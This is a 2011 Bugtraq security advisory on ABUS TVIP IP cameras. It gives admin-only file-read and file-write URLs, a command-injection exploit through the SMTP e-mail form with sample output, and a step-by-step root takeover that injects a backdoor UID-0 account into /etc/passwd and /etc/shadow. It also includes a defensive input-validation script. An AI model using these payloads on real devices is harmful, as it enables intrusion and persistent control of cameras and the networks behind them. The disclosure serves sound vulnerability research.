Message-ID: <54337.5353b77c.1318048665.nsm@mail.stream-portal.org>
Date: Sat, 8 Oct 2011 06:37:45 +0200 (CEST)
From: "Marco van Berkum" <marco@...eam-portal.org>
To: Bugtraq@...urityfocus.com
Subject: ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)

Title  : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum

- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command execution (input validation bug)
- How it's totally compromised including ssh root login.

- Summary

The ABUS 11550 and 21550 are IP webcams that can be configured via a web
interface. While experimenting, multiple vulnerabilities were discovered that
give root access to the camera's operating system (Debian Linux). The
camera's webserver is BOA and runs as root.

Although these vulnerabilities can ONLY be exploited when logged in as admin,
they can still be considered critical, since the camera can be used to gain
access to the network behind it. I did not find a way past the login screen
without proper credentials (yet).

- Arbitrary file read

When logged in as admin it's possible to read any file on the filesystem,
since the webserver is running as root.

http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow

- Arbitrary file upload

Similar to the fileread CGI there is also a filewrite CGI that can
(over)write any file.

http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE

- Arbitrary command execution (input validation bug)

The camera has several HTML forms to configure services such as an FTP client
and an SMTP client. These are used to notify users and upload videos when the
camera's motion detection detects movement. These HTML forms can be used to
execute arbitrary commands as root. I've found bugs in the SMTP and FTP forms,
but probably other forms will contain the same bug (unchecked).

Exploit:
In the configuration -> smtp general part there is a web form where an
administrator's email address can be filled out (Administrator e-Mail address).
The form lacks checking for metacharacters such as ;, | and `.
When a test email is sent from this form, the web interface executes
ssmtp -t <your_input>.
So it is possible to 'break' the command line by using `ls`, for instance.
After submitting the command via the 'test' button this will be the output:

smtp: Connect to host

smtp: MAIL FROM:<backup>
   SMTP server error
 ................SMTP Test Failed...........

Which means the command ran in a directory that contains a backup directory.

`pwd` also works

smtp: Connect to host

smtp: MAIL FROM:</opt/cgi/admin>
   SMTP server error
 ................SMTP Test Failed...........

Unfortunately this only outputs the first line of the command's output.
But, we can work around this :)

The system also contains a System Log function that shows the output of the
system log.
Now, if we want a little more output than just the first line, for instance
"ls /", we can do it by filling out `ls /|logger`, which sends the output
to the system logfile. That can then be viewed from the web interface.

Oct  8 14:35:15 <notice  > root: bin
Oct  8 14:35:15 <notice  > root: dev
Oct  8 14:35:15 <notice  > root: etc
Oct  8 14:35:15 <notice  > root: include
Oct  8 14:35:15 <notice  > root: init
Oct  8 14:35:15 <notice  > root: lib
Oct  8 14:35:15 <notice  > root: linuxrc
Oct  8 14:35:15 <notice  > root: mnt
Oct  8 14:35:15 <notice  > root: opt
Oct  8 14:35:15 <notice  > root: proc
Oct  8 14:35:15 <notice  > root: root
Oct  8 14:35:15 <notice  > root: sbin
Oct  8 14:35:15 <notice  > root: smtp_test.sh
Oct  8 14:35:15 <notice  > root: sys
Oct  8 14:35:15 <notice  > root: tag_replace.sh
Oct  8 14:35:15 <notice  > root: tmp
Oct  8 14:35:15 <notice  > root: usr
Oct  8 14:35:15 <notice  > root: var
Oct  8 14:35:15 <notice  > root: web

The complete command output can also be obtained by redirecting it to a
readable file on the webserver itself, by doing `ls -alR />/web/html/lsoutput.txt`.
It can then be accessed at the url http://ipcamera/lsoutput.txt
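As an added example (hypothetical, not code from the advisory or the ABUS firmware), this is how the test-mail step could be hardened in POSIX sh: the administrator address is checked against a strict allow-list before it reaches any command line, and then handed to ssmtp as a single quoted argument, so the metacharacters named above (;, | and backtick) are rejected instead of interpreted. The function names and the exact ssmtp invocation are assumptions.

```sh
#!/bin/sh
# Added example (hypothetical), not code from the advisory or the camera
# firmware: validate the administrator address before it reaches any
# command line, then call ssmtp with the address as one quoted argument.

# is_safe_email ADDR: return 0 only for a single plausible address made of
# allow-listed characters; anything else (shell metacharacters, spaces,
# quotes, backticks, a second '@', an undotted domain) returns 1.
is_safe_email() {
    addr=$1
    [ -n "$addr" ] && [ ${#addr} -le 254 ] || return 1
    case "$addr" in
        *[!A-Za-z0-9._%+@-]*) return 1 ;;  # any char outside the allow-list
    esac
    local_part=${addr%%@*}
    domain=${addr#*@}
    # No '@' at all leaves local_part equal to addr; an empty local part is
    # rejected as well.
    [ "$local_part" != "$addr" ] && [ -n "$local_part" ] || return 1
    case "$domain" in
        *@*|.*|*.|*..*) return 1 ;;  # second '@', or malformed dot placement
        *.*) return 0 ;;             # at least one label separator present
        *) return 1 ;;
    esac
}

# send_test_mail ADDR: the form handler's "test" action. Refuses unvalidated
# input; the quoted "$1" means the address is never parsed as further shell
# syntax even if the allow-list were loosened later.
send_test_mail() {
    is_safe_email "$1" || { echo "smtp: rejected address" >&2; return 2; }
    printf 'To: %s\nSubject: smtp test\n\ntest\n' "$1" | ssmtp -t "$1"
}
```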

- How it's totally compromised including ssh root login.

I did it in a few steps. First I did a `ls -alR />/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is an SSH server/client :)
So, I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadow file and noticed that user root had
no password, so ssh'ing in was not an option, yet. So I had to create a user,
which I did the following way:

`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo "test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`

So, now we can log in as user test with password test. User test has UID 0,
thus root.

test@...amera's password:
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.GM.com/



BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

[test]#

Voila ;)

Also, it's possible to mount a Samba or NFS share via the web interface and
copy files that way.

Just my two cents
Marco van Berkum



